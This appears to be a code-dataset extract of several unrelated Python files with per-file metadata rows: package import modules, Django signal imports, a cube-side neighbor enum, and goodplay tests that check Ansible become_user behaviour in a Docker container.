from pygfa.graph_element.parser import containment
from pygfa.graph_element.parser import path
from pygfa.graph_element.parser import edge
from pygfa.graph_element.parser import fragment
from pygfa.graph_element.parser import gap
from pygfa.graph_element.parser import group
| 45.666667
| 50
| 0.871046
| 63
| 411
| 5.539683
| 0.238095
| 0.232092
| 0.361032
| 0.541547
| 0.851003
| 0.851003
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085158
| 411
| 9
| 51
| 45.666667
| 0.928191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
79a7dee96667cb45658e23c6fa37d52f73ee4b63
| 156
|
py
|
Python
|
src/PYOPATRA/__init__.py
|
georgiastuart/PythonLPT
|
0be9225f9c2d4a85b70e22dcccb5c0bc6152a739
|
[
"MIT"
] | 3
|
2021-08-05T13:29:04.000Z
|
2021-11-22T20:42:03.000Z
|
src/PYOPATRA/__init__.py
|
georgiastuart/PythonLPT
|
0be9225f9c2d4a85b70e22dcccb5c0bc6152a739
|
[
"MIT"
] | 1
|
2022-03-21T22:51:39.000Z
|
2022-03-21T22:51:39.000Z
|
src/PYOPATRA/__init__.py
|
UT-CHG/PYOPATRA
|
971aa79bf24f26939a96d79193c6d1ee16f5531d
|
[
"MIT"
] | null | null | null |
from .file_parsing import *
from .mesh_vertex import *
from .mesh import *
from .particle import *
from .solver import *
from .objective_functions import *
| 22.285714
| 34
| 0.769231
| 21
| 156
| 5.571429
| 0.47619
| 0.42735
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 156
| 6
| 35
| 26
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
79af72296f3d94aa28cf531f84bd1fc6979d556b
| 160
|
py
|
Python
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 4
|
2019-12-06T06:19:33.000Z
|
2021-12-23T13:05:06.000Z
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 8
|
2020-03-15T03:40:38.000Z
|
2022-03-12T00:50:27.000Z
|
devops-console/apps/orgs/signals_handler.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
from django.db.models.signals import m2m_changed
from django.db.models.signals import post_save
from django.dispatch import receiver
| 22.857143
| 48
| 0.775
| 24
| 160
| 5.083333
| 0.625
| 0.245902
| 0.196721
| 0.295082
| 0.508197
| 0.508197
| 0
| 0
| 0
| 0
| 0
| 0.014184
| 0.11875
| 160
| 6
| 49
| 26.666667
| 0.851064
| 0.13125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8dce0b2a1aab3f68225647a986d5c6917b20a924
| 3,336
|
py
|
Python
|
MCState/MCubeSide.py
|
MagicCubeProject/MagicCubeLib
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | null | null | null |
MCState/MCubeSide.py
|
MagicCubeProject/MagicCubeLib
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | 1
|
2018-03-25T17:11:15.000Z
|
2018-03-25T17:11:15.000Z
|
MCState/MCubeSide.py
|
Narekmouse/gtpy
|
4d66f42bb0804837d048a14d7fe4216683c57c71
|
[
"Apache-2.0"
] | null | null | null |
from enum import Enum, auto
from MCState.MCSide.MCElementDirection import MCubeDirection
class MCubeSide(Enum):
FRONT = auto()
RIGHT = auto()
DOWN = auto()
UP = auto()
LEFT = auto()
BACK = auto()
def __str__(self):
return str(self.name)
def neighbor(self,direction):
"""
        neighbor is the side that shares elements with this side
        :param direction: the MCubeDirection to look toward
        :return: the neighboring MCubeSide
"""
if self is MCubeSide.FRONT:
if direction is MCubeDirection.NORTH:
return MCubeSide.UP
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.RIGHT:
if direction is MCubeDirection.NORTH:
return MCubeSide.UP
elif direction is MCubeDirection.EAST:
return MCubeSide.BACK
elif direction is MCubeDirection.SOUTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.WEST:
return MCubeSide.FRONT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.BACK:
if direction is MCubeDirection.NORTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.UP
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.LEFT:
if direction is MCubeDirection.NORTH:
return MCubeSide.DOWN
elif direction is MCubeDirection.EAST:
return MCubeSide.BACK
elif direction is MCubeDirection.SOUTH:
return MCubeSide.UP
elif direction is MCubeDirection.WEST:
return MCubeSide.FRONT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.UP:
if direction is MCubeDirection.NORTH:
return MCubeSide.BACK
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.FRONT
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
elif self is MCubeSide.DOWN:
if direction is MCubeDirection.NORTH:
return MCubeSide.FRONT
elif direction is MCubeDirection.EAST:
return MCubeSide.RIGHT
elif direction is MCubeDirection.SOUTH:
return MCubeSide.BACK
elif direction is MCubeDirection.WEST:
return MCubeSide.LEFT
else:
raise ValueError("Incrrect Directon : " + direction)
| 37.483146
| 68
| 0.572842
| 306
| 3,336
| 6.232026
| 0.137255
| 0.138437
| 0.31463
| 0.273728
| 0.842685
| 0.842685
| 0.842685
| 0.783954
| 0.783954
| 0.783954
| 0
| 0
| 0.376199
| 3,336
| 88
| 69
| 37.909091
| 0.916386
| 0.023681
| 0
| 0.769231
| 0
| 0
| 0.037302
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.025641
| 0.012821
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5c04bb25144186551382a4e30f1915d7ed7d1d0a
| 4,330
|
py
|
Python
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 16
|
2016-03-16T12:20:49.000Z
|
2020-04-17T15:31:54.000Z
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 290
|
2016-02-26T06:49:32.000Z
|
2022-03-18T08:32:25.000Z
|
tests/test_ansible_become_method_dockerexec.py
|
goodplay/goodplay
|
dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca
|
[
"Apache-2.0"
] | 9
|
2016-01-20T20:55:44.000Z
|
2020-11-04T03:51:03.000Z
|
# -*- coding: utf-8 -*-
from goodplay_helpers import skip_if_no_docker, smart_create
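# smart_create (a goodplay test helper) appears to split the triple-quoted
# blob on "## <path>" headers and write each section out as a separate file
# under testdir.tmpdir, so a single string below stands in for a
# docker-compose.yml, an inventory, and a test playbook.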
@skip_if_no_docker
def test_become_user_on_task_without_become_does_not_execute_as_become_user(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: intentionally only specify become_user on this task
file:
path: /opt/myservice/somefile
state: touch
become_user: myservice
- name: ensure somefile is owned by root user which is not the become_user
file:
path: /opt/myservice/somefile
owner: root
group: root
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
@skip_if_no_docker
def test_become_with_become_user_on_play(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
become_user: myservice
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: make some file operation as myservice user
file:
path: /opt/myservice/somefile
state: touch
become: yes
- name: ensure somefile is owned by myservice user
file:
path: /opt/myservice/somefile
owner: myservice
group: myservice
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
@skip_if_no_docker
def test_become_with_become_user_on_task(testdir):
smart_create(testdir.tmpdir, '''
## docker-compose.yml
version: "2"
services:
host1:
image: centos:centos6
tty: True
## inventory
host1 ansible_user=root
## test_playbook.yml
- hosts: host1
gather_facts: no
tasks:
- name: create system group myservice
group:
name: myservice
system: yes
state: present
- name: create system user myservice
user:
name: myservice
group: myservice
shell: /sbin/nologin
system: yes
state: present
- name: create myservice directory
file:
path: /opt/myservice
owner: myservice
group: myservice
mode: 0700
state: directory
- name: make some file operation as myservice user
file:
path: /opt/myservice/somefile
state: touch
become: yes
become_user: myservice
- name: ensure somefile is owned by myservice user
file:
path: /opt/myservice/somefile
owner: myservice
group: myservice
state: file
tags: test
''')
result = testdir.inline_run('-s')
result.assertoutcome(passed=1)
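# Taken together, the three tests pin down dockerexec's become semantics:
# become_user alone must not switch users, while become combined with
# become_user (set on the play or on the task) must perform the file
# operation as the myservice user.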
| 24.055556
| 85
| 0.551039
| 438
| 4,330
| 5.315068
| 0.19863
| 0.066151
| 0.042526
| 0.07732
| 0.905498
| 0.905498
| 0.905498
| 0.878007
| 0.861684
| 0.833763
| 0
| 0.01158
| 0.381755
| 4,330
| 179
| 86
| 24.189944
| 0.85805
| 0.00485
| 0
| 0.946667
| 0
| 0
| 0.848386
| 0.032041
| 0
| 0
| 0
| 0
| 0.02
| 1
| 0.02
| false
| 0.02
| 0.006667
| 0
| 0.026667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|